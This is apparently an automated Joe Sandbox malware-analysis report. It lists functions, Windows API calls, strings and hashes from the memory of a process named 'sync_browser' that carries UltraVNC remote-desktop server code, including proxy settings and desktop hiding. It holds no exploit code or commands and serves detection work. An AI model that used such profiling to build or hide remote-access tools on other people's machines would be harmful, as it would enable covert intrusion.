l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette, xrefs: 00007FF67E7D5FC8
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table, xrefs: 00007FF67E7D5F61
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette, xrefs: 00007FF67E7D5FAF

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: ErrorFreeLastLibrary$AddressDeleteDisplayEntriesEnumHeapLoadPaletteProcReleaseSettingsSystem_errnofreemalloc
String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done
API String ID: 181403729-1081969236
Opcode ID: 53fb3c1bb1965282e4da31d922302c79b62d7af4abef1ccc30ce768ea4cf9713
Instruction ID: 24dde60466fd18b880fd784c1f5e0b36d16e686afee6bdc8b77d0cd841bcee05
Opcode Fuzzy Hash: 53fb3c1bb1965282e4da31d922302c79b62d7af4abef1ccc30ce768ea4cf9713
Instruction Fuzzy Hash: 88613863B29AC281E714DB64E4553F977A4EB64708F844036FA8ECB291EE3CD14EC300

Function 00007FF67E7D5550 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 162windowCOMMON

Download Yara Rule

APIs

free.LIBCMT ref: 00007FF67E7D55A5

Part of subcall function 00007FF67E878BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF67E87748C), ref: 00007FF67E878C0A
Part of subcall function 00007FF67E878BF4: _errno.LIBCMT ref: 00007FF67E878C14
Part of subcall function 00007FF67E878BF4: GetLastError.KERNEL32(?,?,?,00007FF67E87748C), ref: 00007FF67E878C1C

Part of subcall function 00007FF67E7D70B0: EnumDisplaySettingsA.USER32 ref: 00007FF67E7D70F4
Part of subcall function 00007FF67E7D70B0: LoadLibraryA.KERNEL32 ref: 00007FF67E7D7109
Part of subcall function 00007FF67E7D70B0: GetProcAddress.KERNEL32 ref: 00007FF67E7D712D
Part of subcall function 00007FF67E7D70B0: FreeLibrary.KERNEL32 ref: 00007FF67E7D71F2

malloc.LIBCMT ref: 00007FF67E7D55AF
GetDC.USER32 ref: 00007FF67E7D5611
GetSystemPaletteEntries.GDI32 ref: 00007FF67E7D563B
GetLastError.KERNEL32 ref: 00007FF67E7D5644
DeleteDC.GDI32 ref: 00007FF67E7D5675
ReleaseDC.USER32 ref: 00007FF67E7D5682

Strings

l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries, xrefs: 00007FF67E7D564A
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called, xrefs: 00007FF67E7D557A
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done, xrefs: 00007FF67E7D577E
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette, xrefs: 00007FF67E7D561C
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table, xrefs: 00007FF67E7D55BD
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette, xrefs: 00007FF67E7D5603

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: ErrorFreeLastLibrary$AddressDeleteDisplayEntriesEnumHeapLoadPaletteProcReleaseSettingsSystem_errnofreemalloc
String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done
API String ID: 181403729-1081969236
Opcode ID: 53fd9ebbc342151809572dc5d5c454a9c87e4ee11642373697c9161ead6f8e27
Instruction ID: 58c0bb0a1737714216bb2d1863a0f4bd9e4bec170440b5beac9638ddc8c9fee5
Opcode Fuzzy Hash: 53fd9ebbc342151809572dc5d5c454a9c87e4ee11642373697c9161ead6f8e27
Instruction Fuzzy Hash: 65514863B2998282E714DB64E8542FC6395EF65748F94413AFD8ECB695DE3CE14EC300

Function 00007FF67E7CB030 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 135COMMON

Download Yara Rule

APIs

_wgetenv.LIBCMT ref: 00007FF67E7CB08C
_wgetenv.LIBCMT ref: 00007FF67E7CB05E

Part of subcall function 00007FF67E879500: _errno.LIBCMT ref: 00007FF67E879515
Part of subcall function 00007FF67E879500: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67E879520

_wgetenv.LIBCMT ref: 00007FF67E7CB0AE
_wgetenv.LIBCMT ref: 00007FF67E7CB0DC
inet_ntoa.WS2_32 ref: 00007FF67E7CB1C8
free.LIBCMT ref: 00007FF67E7CB1D9
free.LIBCMT ref: 00007FF67E7CB22C

Strings

!, xrefs: 00007FF67E7CB14B
SOCKS4_DIRECT, xrefs: 00007FF67E7CB049
CONNECT_DIRECT, xrefs: 00007FF67E7CB0D5, 00007FF67E7CB0E9
HTTP_DIRECT, xrefs: 00007FF67E7CB0A7, 00007FF67E7CB0BB
SOCKS_DIRECT, xrefs: 00007FF67E7CB085, 00007FF67E7CB099
SOCKS5_DIRECT, xrefs: 00007FF67E7CB050

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: _wgetenv$free$_errno_invalid_parameter_noinfoinet_ntoa
String ID: !$CONNECT_DIRECT$HTTP_DIRECT$SOCKS4_DIRECT$SOCKS5_DIRECT$SOCKS_DIRECT
API String ID: 1123868200-453874877
Opcode ID: 02c3fb42e6d6bc28dc7b44bb22b1b02568e63af234dce31050af9c07c747a59d
Instruction ID: 785cab2dd14ca34c165c18db6b45e7b6d4027f90d781c34cf84cc186fe3459e4
Opcode Fuzzy Hash: 02c3fb42e6d6bc28dc7b44bb22b1b02568e63af234dce31050af9c07c747a59d
Instruction Fuzzy Hash: 6D51A423B2968285EE619B65E4502B9A7A8FFA4784F480535FA4DC77A5EF3CE448C700

Function 00007FF67E7F5100 Relevance: 22.7, APIs: 15, Instructions: 242COMMON

Download Yara Rule

APIs

CreateRectRgn.GDI32 ref: 00007FF67E7F51F4
CreateRectRgn.GDI32 ref: 00007FF67E7F52DA
CombineRgn.GDI32 ref: 00007FF67E7F52FA
DeleteObject.GDI32 ref: 00007FF67E7F5303
free.LIBCMT ref: 00007FF67E7F530C
CreateRectRgn.GDI32 ref: 00007FF67E7F53B3
CombineRgn.GDI32 ref: 00007FF67E7F53D3
DeleteObject.GDI32 ref: 00007FF67E7F53DC
CreateRectRgn.GDI32 ref: 00007FF67E7F5405
DeleteObject.GDI32 ref: 00007FF67E7F542E
free.LIBCMT ref: 00007FF67E7F53E5

Part of subcall function 00007FF67E878BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF67E87748C), ref: 00007FF67E878C0A
Part of subcall function 00007FF67E878BF4: _errno.LIBCMT ref: 00007FF67E878C14
Part of subcall function 00007FF67E878BF4: GetLastError.KERNEL32(?,?,?,00007FF67E87748C), ref: 00007FF67E878C1C

Part of subcall function 00007FF67E8792A4: malloc.LIBCMT ref: 00007FF67E8792C7

CreateRectRgn.GDI32 ref: 00007FF67E7F5456
CombineRgn.GDI32 ref: 00007FF67E7F5476
DeleteObject.GDI32 ref: 00007FF67E7F547F
free.LIBCMT ref: 00007FF67E7F5488

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CreateRect$DeleteObject$Combinefree$ErrorFreeHeapLast_errnomalloc
String ID:
API String ID: 1881577244-0
Opcode ID: a2669a54d84d0355307a6dfdc82ec72f79d1e54b2eee423c051edab8dd6adb49
Instruction ID: e4b055b42100baac16e4c3361f816f44d95be074cfb5f7cbb3a2e434f85202a3
Opcode Fuzzy Hash: a2669a54d84d0355307a6dfdc82ec72f79d1e54b2eee423c051edab8dd6adb49
Instruction Fuzzy Hash: 4AA1B273B286864ADB248F19E444A7AB755FBA4B88F501135ED0ED3B54DF3CE809CB00

Function 00007FF67E7D00D0 Relevance: 22.6, APIs: 15, Instructions: 109COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF67E7CF840: CreateRectRgn.GDI32 ref: 00007FF67E7CF872
Part of subcall function 00007FF67E7CF840: CombineRgn.GDI32 ref: 00007FF67E7CF88A
Part of subcall function 00007FF67E7CF840: CombineRgn.GDI32 ref: 00007FF67E7CF89F

GetRgnBox.GDI32 ref: 00007FF67E7D0116
OffsetRgn.GDI32 ref: 00007FF67E7D0135
SetRectRgn.GDI32 ref: 00007FF67E7D0163
CombineRgn.GDI32 ref: 00007FF67E7D0179
DeleteObject.GDI32 ref: 00007FF67E7D0183
free.LIBCMT ref: 00007FF67E7D018D
GetRgnBox.GDI32 ref: 00007FF67E7D019A
OffsetRgn.GDI32 ref: 00007FF67E7D01AF
SetRectRgn.GDI32 ref: 00007FF67E7D01ED
CombineRgn.GDI32 ref: 00007FF67E7D0203
DeleteObject.GDI32 ref: 00007FF67E7D020D
free.LIBCMT ref: 00007FF67E7D0217
GetRgnBox.GDI32 ref: 00007FF67E7D0224
DeleteObject.GDI32 ref: 00007FF67E7D0242
free.LIBCMT ref: 00007FF67E7D024C

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Combine$DeleteObjectRectfree$Offset$Create
String ID:
API String ID: 2677898628-0
Opcode ID: 3ee7ecd204df7dd3f615213fc9b16b46c74043faa91b9eb9bd615f088202f8d8
Instruction ID: 59839947d118c08f70165652cee149a4f9bc93b7e39eaee0c3d2da4722e04c34
Opcode Fuzzy Hash: 3ee7ecd204df7dd3f615213fc9b16b46c74043faa91b9eb9bd615f088202f8d8
Instruction Fuzzy Hash: A4412A77B2492189EB10DBA6E8559AD7730FB94B99B404132EE1E97B68CF3CD449C300

Function 00007FF67E7E551D Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 293COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF67E825F30: EnterCriticalSection.KERNEL32(?,?,?,00007FF67E7E3ABC), ref: 00007FF67E825F41
Part of subcall function 00007FF67E825F30: LeaveCriticalSection.KERNEL32(?,?,?,00007FF67E7E3ABC), ref: 00007FF67E825F75

OpenInputDesktop.USER32 ref: 00007FF67E7E407F
CloseDesktop.USER32 ref: 00007FF67E7E40C2

Part of subcall function 00007FF67E825F30: LeaveCriticalSection.KERNEL32(?,?,?,00007FF67E7E3ABC), ref: 00007FF67E825F8C

EnterCriticalSection.KERNEL32 ref: 00007FF67E7E55F1
LeaveCriticalSection.KERNEL32 ref: 00007FF67E7E5622
InvalidateRect.USER32 ref: 00007FF67E7E56E7
LeaveCriticalSection.KERNEL32 ref: 00007FF67E7E56FE

Strings

vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF67E7E409A
W, xrefs: 00007FF67E7E55E4
vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF67E7E4060
vncservice.cpp : SelectDesktop , xrefs: 00007FF67E7E404B
vncclient.cpp : vncClientThread , xrefs: 00007FF67E7E4029

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$DesktopEnter$CloseInputInvalidateOpenRect
String ID: W$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
API String ID: 1769082246-4238595597
Opcode ID: e970080873c8215d67751cf4df8fe2b5e593792b79e840585fb32c8e919cf0fc
Instruction ID: 205f3d099eade47da72e73591b1c194b2f1992640dd6f518f620d1e353a2b5e0
Opcode Fuzzy Hash: e970080873c8215d67751cf4df8fe2b5e593792b79e840585fb32c8e919cf0fc
Instruction Fuzzy Hash: 93E1D033A18AD185EB54CB29C458BFE7BA5EB99B84F154132EA4C877A5CF3CE449C700

Function 00007FF67E818080 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 85libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF67E819A40: GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E819A92
Part of subcall function 00007FF67E819A40: RegOpenKeyExA.ADVAPI32 ref: 00007FF67E819AC0

GetModuleFileNameA.KERNEL32 ref: 00007FF67E8180D1
LoadLibraryA.KERNEL32 ref: 00007FF67E81811D
GetProcAddress.KERNEL32 ref: 00007FF67E818139
CoInitialize.OLE32 ref: 00007FF67E818160
CoUninitialize.OLE32 ref: 00007FF67E818192
FreeLibrary.KERNEL32 ref: 00007FF67E81819B

Strings

\authSSP.dll, xrefs: 00007FF67E8180FA
vncntlm.cpp : GetProcAddress, xrefs: 00007FF67E81813F
You selected ms-logon, but authSSP.dllwas not found.Check you installation, xrefs: 00007FF67E8181D6
WARNING, xrefs: 00007FF67E8181CF
CUPSD, xrefs: 00007FF67E81812F
CheckUserPasswordSDUni result=%i, xrefs: 00007FF67E818175

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Library$AddressFileFreeInitializeLoadModuleNameOpenPrivateProcProfileUninitialize
String ID: CUPSD$CheckUserPasswordSDUni result=%i$WARNING$You selected ms-logon, but authSSP.dllwas not found.Check you installation$\authSSP.dll$vncntlm.cpp : GetProcAddress
API String ID: 1719662965-904825817
Opcode ID: 49f2f648c281e1af0c21fd0208b7c79f38fee02d2a9911ef4cddafc3a37f6c47
Instruction ID: 4ad2823015636e7862078f0ae4f7ec7be8ac3068cfc9421eaddf44376b2a12be
Opcode Fuzzy Hash: 49f2f648c281e1af0c21fd0208b7c79f38fee02d2a9911ef4cddafc3a37f6c47
Instruction Fuzzy Hash: 7E41A423B28A8295FA209B65A8453B9A3A4FF68780F445536FD6DC77A5DE3CE14CC700

Function 00007FF67E7CAB70 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 65COMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32 ref: 00007FF67E7CABA9
GetLastError.KERNEL32 ref: 00007FF67E7CABB3
SystemParametersInfoA.USER32 ref: 00007FF67E7CAC07
GetLastError.KERNEL32 ref: 00007FF67E7CAC11
SystemParametersInfoA.USER32 ref: 00007FF67E7CAC62
GetLastError.KERNEL32 ref: 00007FF67E7CAC6C

Strings

HideDesktop.cpp : Failed to restore SPI value for SPI_SETFONTSMOOTHINGTYPE (0x%08x), xrefs: 00007FF67E7CAC72
HideDesktop.cpp : Failed to restore SPI value for SPI_SETCLEARTYPE (0x%08x), xrefs: 00007FF67E7CAC17
HideDesktop.cpp : Failed to restore SPI value for SPI_SETFONTSMOOTHING (0x%08x), xrefs: 00007FF67E7CABB9
HideDesktop.cpp : Restored SPI value for SPI_SETFONTSMOOTHINGTYPE: 0x%08x, xrefs: 00007FF67E7CAC8A
HideDesktop.cpp : Restored SPI value for SPI_SETFONTSMOOTHING: 0x%08x, xrefs: 00007FF67E7CABD4
HideDesktop.cpp : Restored SPI value for SPI_SETCLEARTYPE: 0x%08x, xrefs: 00007FF67E7CAC2F

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: ErrorInfoLastParametersSystem
String ID: HideDesktop.cpp : Failed to restore SPI value for SPI_SETCLEARTYPE (0x%08x)$HideDesktop.cpp : Failed to restore SPI value for SPI_SETFONTSMOOTHING (0x%08x)$HideDesktop.cpp : Failed to restore SPI value for SPI_SETFONTSMOOTHINGTYPE (0x%08x)$HideDesktop.cpp : Restored SPI value for SPI_SETCLEARTYPE: 0x%08x$HideDesktop.cpp : Restored SPI value for SPI_SETFONTSMOOTHING: 0x%08x$HideDesktop.cpp : Restored SPI value for SPI_SETFONTSMOOTHINGTYPE: 0x%08x
API String ID: 2777246624-426764769
Opcode ID: be58b1c1191ffcc8586d2d23b3617e6acfb6b4a2149be82d11eb37b622f5d697
Instruction ID: c1502c0f7f838ab6102763a4071021eb6070060af62c72656a6e2bb391e59b00
Opcode Fuzzy Hash: be58b1c1191ffcc8586d2d23b3617e6acfb6b4a2149be82d11eb37b622f5d697
Instruction Fuzzy Hash: 92313A67F3894356F7208B65E804BB5A7A9BF75749F444632F40ED26B1EE2CA84EC300

Function 00007FF67E7F11E0 Relevance: 19.6, APIs: 13, Instructions: 103windowCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,00000000,?,00000000,?,00007FF67E7FC1D6), ref: 00007FF67E7F1206
CreateCompatibleBitmap.GDI32 ref: 00007FF67E7F1221
LeaveCriticalSection.KERNEL32(?,?,?,?,?,00000000,?,00000000,?,00007FF67E7FC1D6), ref: 00007FF67E7F1236
SelectObject.GDI32 ref: 00007FF67E7F1255
DeleteObject.GDI32 ref: 00007FF67E7F1266
LeaveCriticalSection.KERNEL32(?,?,?,?,?,00000000,?,00000000,?,00007FF67E7FC1D6), ref: 00007FF67E7F1273

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
